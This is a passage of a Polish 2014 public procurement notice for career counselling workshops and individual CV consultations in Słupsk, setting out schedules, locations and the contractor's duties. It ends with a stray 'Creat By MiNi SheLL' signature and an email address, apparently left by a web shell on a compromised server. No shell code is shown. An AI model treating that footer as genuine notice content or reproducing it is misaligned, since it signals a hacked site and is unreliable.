1)	Zakres tematyczny I etapu warsztatów z doradztwa zawodowego obejmuje zasady autoprezentacji, komunikowania się z potencjalnym pracodawcą przed zatrudnieniem i w trakcie zatrudnienia, zasady sporządzania dokumentów aplikacyjnych, analiza lokalnego rynku pracy, umiejętność poruszania się po rynku pracy, szukania ofert pracy, sposoby oraz zasady składania dokumentów aplikacyjnych (80% czasu trwania warsztatów przeprowadzić należy za pomocą aktywnych metod pracy z grupą).
2)	Czas trwania I etapu warsztatu grupowego z doradztwa zawodowego: 16 godzin dydaktycznych (4 spotkania po 4 godziny dydaktyczne).
3)	Miejsce realizacji I etapu warsztatu: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy Al. Sienkiewicza 20 (zapewnienie Sali szkoleniowej, poczęstunku, zwrotu kosztów przejazdu uczestników projektu na zajęcia grupowe leży po stronie Zamawiającego).
4)	Termin realizacji I etapu warsztatu grupowego z doradztwa zawodowego: do 15.08.2014 r. w godzinach od 09.00 do maksymalnie 16.00 godziny. Dokładny terminarz zajęć ustalony zostanie z Wykonawcą na etapie podpisania umowy. Spotkania będą odbywały się w dni robocze od poniedziałku do piątku.
5.	Etap II: Indywidualne konsultacje z doradcą zawodowym
1)	Zakres indywidualnych konsultacji z doradca zawodowym: sporządzenie wspólnie z uczestnikiem konsultacji dokumentów aplikacyjnych (CV, przykładowy list motywacyjny odpowiadający na przykładową ofertę pracy zgodną              z predyspozycjami zawodowymi  danej osoby). Konsultacje prowadzone przy komputerze, efektem końcowym konsultacji będzie przygotowane i wydrukowane CV oraz list motywacyjny.
2)	Czas trwania indywidualnych konsultacji z doradcą zawodowym: 2 godziny zegarowe na jedną osobę, co stanowi łącznie 22 godziny zegarowe. Terminy spotkań indywidualnych dostosowane zostaną do indywidualnych potrzeb uczestników konsultacji
3)	Miejsce realizacji II etapu doradztwa: siedziba Powiatowego Centrum Pomocy Rodzinie w Słupsku przy                Al. Sienkiewicza 20 (zapewnienie Sali szkoleniowej, zwrotu kosztów przejazdu uczestników projektu na zajęcia indywidualne leży po stronie Zamawiającego).
4)	Termin realizacji II etapu doradztwa zawodowego: od 15.07.2014 r. do 30.09.2014 r. w godzinach od 08.00 do maksymalnie 16.00 godziny. Spotkania będą odbywały się w dni robocze od poniedziałku do piątku.
6.	Wykonawca zobowiązany jest do:
1)	przeprowadzenia doradztwa zawodowego w dwóch etapach;
2)	zapewnienia materiałów szkoleniowych dla każdego uczestnika projektu (w tym jeden dodatkowy do dokumentacji projektowej);
3)	przeprowadzenia ankiety początkowej (w pierwszym dniu zajęć I etapu warsztatów) i końcowej (w ostatnim dniu zajęć           I etapu warsztatów) badających poziom wiedzy i umiejętności z zakresu poruszania się po rynku pracy;
4)	przygotowania konspektów grupowych zajęć warsztatowych;
5)	prowadzenia dziennika zajęć, karty czasu pracy trenera, list obecności (dotyczy I etapu doradztwa zawodowego) oraz indywidualnych kart doradztwa zawodowego (dotyczy II etapu doradztwa zawodowego);
6)	sporządzenia indywidualnych opinii nt. każdego uczestnika warsztatu na podstawie przeprowadzonych ankiet początkowych i końcowych badających ich poziom wiedzy i umiejętności z zakresu objętego przedmiotem zamówienia w części nr IV;
7)	przygotowania dokumentów aplikacyjnych (CV, list motywacyjny) dla każdego uczestnika doradztwa zawodowego oraz przekazania ich każdemu uczestnikowi w wersji papierowej i elektronicznej;
8)	przekazania Zamawiającemu dokumentów aplikacyjnych każdego uczestnika doradztwa zawodowego w wersji papierowej i elektronicznej;
9)	zapewnienie akcesoriów niezbędnych do przeprowadzenia doradztwa zawodowego, w tym sprzętu komputerowego do sporządzenia i wydrukowania dokumentów aplikacyjnych;
10)	oznakowania wszystkich dokumentów związanych z przygotowaniem i zorganizowaniem ww. warsztatów i indywidualnych konsultacji zgodnie z wytycznymi dotyczącymi oznaczania projektów w ramach POKL 2007-2013.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.57.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com